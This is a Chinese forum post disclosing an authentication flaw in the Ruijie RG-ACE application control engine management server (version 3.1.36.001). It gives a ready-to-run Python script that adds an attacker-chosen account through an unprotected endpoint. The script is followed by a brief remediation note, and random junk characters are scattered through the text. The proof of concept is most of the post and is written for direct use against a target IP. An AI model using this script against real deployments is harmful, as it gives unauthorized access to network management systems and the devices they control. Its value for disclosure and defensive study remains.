找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2195|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)% c! S7 I% D$ g. |, a7 I
/ b* Y/ ^, {; L1 k6 ]' d! R" H

2 j8 T. u9 J  z$ ]& B7 q测试的具体版本是
1 ?6 c4 V  \; o6 u; C产品名称: 锐捷应用控制引擎
) v/ v0 t9 N1 T  ]1 G1 q版本号: 3.1.36.001 TC
! R1 A* V" J# b3 Z3 V: Z编译时间: 201104291730# K$ Y& ]) \% c4 C% u5 n2 p( O

$ h6 D8 L" d/ |, P' @" X0 Z( g
& w9 Q% H  n& m漏洞证明:5 W2 T- q' W% U" g' \* E* F
7 r7 Q+ S8 U5 C. k- Z& N3 u: I
) A. ^! G* \- Q9 B8 x* F/ f' w
. R& i  n9 W! D( y

. C) @% J4 M/ J: r' i9 k# Z
1 J8 P/ M, \) H2 _8 p, S  R" k4 Q7 m2 L" A  q. r5 L! W  o8 L
执行脚本
! e! a8 p% \6 c#! /usr/bin/env python
. i  \) `- u. i1 r5 n#coding=gbk$ c$ x% Y$ O& d' q3 g( W& p
#RG-ACE管理服务器 V3.1.36.001
8 x9 P8 |# ?* }8 J3 F% N* e& Ximport urllib2, urllib,cookielib
) C) q( o' d) i' `! _/ M7 V# lurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
* Z# Y" i# i9 P7 ?3 }* n* j$ V8 sopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
6 k  Y  D+ F; `+ {4 _% kopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]- d5 |: ]4 y: l. y
post=(("event","userManager.doInsertUserInfo"),) K! S( U' H* n- v3 \- s9 A- {
("useractionname","addButtonValue"),& C/ @1 W9 C9 s0 n6 c, C
("useropermanager","userManager"),2 r2 ^: e  g  o& w, V4 N' b
("userName","t"), #######账号自己加
9 `: x; T' H  N* W) o9 S("pwd","aaaaaa"),######密码自己加
8 V; O9 u7 T" i("trueName","ad"),8 V& C2 _: R2 `% a
("email",""),% H2 ~: t) Q6 U% u5 j
("mobilePhone",""),, N  D$ A0 z3 h4 [: q
("officePhone",""),% ]' X6 V2 |; x9 b
("addr",""),
! g5 U2 O* h3 Y7 B8 S5 k("submit","确定"))
. R+ i# [% n3 R2 E( S7 purllib2.install_opener(opener)# r  G+ a2 j) M6 u
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
$ V9 [- {" f! c1 C4 }7 G& d9 `print "Done"# t: N0 N$ P$ S2 l: D
- _4 K+ i5 q4 T/ ]9 E2 F
登录,连接设备7 y- ~! |+ ~$ T9 R$ }4 z) h, w

* ^6 h  c  j, `7 c/ W
( g6 m8 Z. y4 U9 F
/ v/ X: X$ ^9 A% {  G# q3 O( J9 E' o
3 |7 C: Q% u* \7 b
默认的管理员admin权限更大点
' E& _  c+ {2 T9 w5 l- s2 B+ F& z" @1 m3 ?6 Z. c5 Y# H
- X5 v& F8 E2 R

6 G. p) @, o6 V, _% t
5 ^& A7 @8 e2 i  R
& U1 o$ ^3 B8 y修复方案:
' _: ]7 X; G# d加强对接口的权限验证$ o# I3 Y) p! u: F- ~' @+ v
  Q/ b' c0 v9 S2 }# \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表